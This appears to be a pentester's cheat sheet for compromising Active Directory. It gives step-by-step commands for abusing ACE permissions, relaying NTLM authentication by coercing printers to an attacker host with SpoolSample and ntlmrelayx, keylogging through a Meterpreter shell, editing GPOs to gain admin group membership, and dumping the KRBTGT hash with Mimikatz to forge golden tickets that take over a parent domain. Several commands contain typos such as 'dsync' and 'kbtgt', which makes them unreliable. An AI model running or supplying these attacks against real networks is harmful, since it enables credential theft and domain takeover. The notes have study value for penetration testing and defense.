Active Directory Misconfigurations

Permission Delegation

• Permissions to functions may be delegated as a standard functions itself
• Privilege creep becomes a problem eventually
• Discretionary ACLs are controlled by Access Control Entries (ACEs)

The following ACEs are critical and prone to be exploited

• GenericAll, complete control and creation of an object
• ForceChangePassword, change the password of a user and sometimes administrator passwords
• AddMembers, add a user to an existing group
• GenericWrite, update any non-protected parameters of the target, e.g. paths to scripts.
• WriteOwner, change owner of a target object.
• WriteDACL, create new ACEs to an object's DACL
• AllExtendendRights all control over an object's permission

Tools to exploit ACEs

• AD-RSAT

• Powersploit

• BloodHound, check permissions to target

Usage

• Add user to a group via powershell

Add-GroupMember "<GroupName>" -Members "<username>"

• List info about groups, preferably administration groups

Get-ADGroupMember -Identity "<GroupName>"

• Set new password for user, afterwards reconnect session

$Password = ConvertTo-SecureString "password123#" -AsPlainText -Force 
Set-ADAccountPassword -Identity "<username>" -Reset -NewPassword $Password

Kerberos Delegation

• Unconstrained (without limit) delegation, exploit
• Constrained delegation
• Resource based constrained delegation (RBCD), service owner specifies which resources can bind. Set by msDS-AllowedToActOnBehalfOfOtherIdentity

Delegatable Services

• HTTP
• CIFS
• LDAP
• HOST
• MSSQL

Usage

• Enumerate via powerview

Import-Module .\PowerView.ps1
Get-NetUser -TrustedToAuth

Automated Relays

Machine Accounts

• Administrative machine account of one host having administrative permissions over another host

Printers

• Target has to have an SMB server
• Spooler, PetitPotam, PrintNightmare are printer exploits
• Query printer services through a servers domain

GWMI Win32_Printer -Computer <domain>
Get-PrinterPort -ComputerName <domain>

• SMB signing may be enabled but must not be enforced in order for the exploit to work, check via

nmap --script smb2-securitymode -p 445 printer.example.com plotter.example.com

• Start SMB relay on attacker, use IP instead of domain to trigger NTLM auth

ntlmrelayx.py -smb2support -t smb://"$TARGET_IP" -debug

• Authenticate on attacker with the credentials already gained from a windows computer

SpoolSample.exe <domain> "$ATTACKER_IP"

• Authenticate with the received credential

ntlmrelayx.py -smb2support -t smb://"$TARGET_IP" -debug -c 'whoami /all' -debug

Active Directory Users

Credentials

Keylogging

• With a meterpreter shell migrate to an active user's process and set a keylogger

migrate <processID>
keyscan_start

• To inspect the results

keyscan_dump

Group Policy Objects

• Every GPO has a GUID
• Local Policies are configured for application rules for FW, Windows-Defender, Applocker
  • Other local policies are group memberships, startup config, protocols
  • Group policies change configuration of these remotely over AD
• GPOs are stored on the SYSVOL to be distributed to any machine in the domain

Usage

• Target is to add the user to either an RDP or SSH group and to connect via this group afterwards
• Start a cmd with a AD user and execute mmc through it

runas /netonly /user:<domain>\<username> cmd.exe
mmc

• Check connection of the cmd.exe via

dir \\<domain>\sysvol

• Click File -> Add/Remove Snap-in -> Group Policy Management -> OK
• On the left tree do Group Policy Management -> Forest bla -> Domains -> <domain> -> Server -> Management Servers and right click to edit the group
• On the left tree Computer Configuration -> Policies -> Windows Settings -> Security Settings -> right click Restricted Groups -> Add Group -> name like IT Support -> edit the group and Add Administrators and Remote Desktop Users groups

Certificates

• AD Certificate Services

Domain Trusts

• Domain Trusts offer access to resources to users in the domain

  • Directional, from trusted domain to another truster domain
  • Transitive, beyond more than just one other domain

• Pwn parent child relationship between directional domain trusts via krbtgt and a golden ticket

• krbtgt as an account signs and encrypts TGTs
• Crafting a golden ticket by becoming a TGS. Following info is needed
  • FQDN
  • Security identifier of the domain (SI)
  • Target's username
  • KRBTGT password hash store on the DC

Usage

• KRBTGT via Mimikatz, resulting in Hash NTLM

privilege::debug
lsadump::dsync /user:<username\kbtgt>

• Craft the ticket with the help of this hash

• Alternatively, InterRealm TGTs are used to get resources between domains in order to pwn the parent by adding the Enterprise Admin group as an extraSID,commonly this is S-1-5-21-<RootDomain>-519

• SID of Child DC is needed, as well as the SID of the Enterprise Admin in the parent domain
• Get child SIDs via

Get-ADComputer -Identity "<DCChildCN>"

• Get parent SID via

Get-ADGroup -Identity "Enterprise Admins" -Server <domain>

• Include additional SIDs from other domains into KERB_VALIDATION_INFO via Mimikatz

privilege::debug
kerberos golden /user:Administrator /domain:<child.domain> /sid:<ChildSID> /service:kbtgt /rc4:<NTLMHash of krbtgt> /sids:<Enterprise Admin group SID> /ptt
exit
dir \\DCdomain\dir$
dir \\Parentdomain\dir$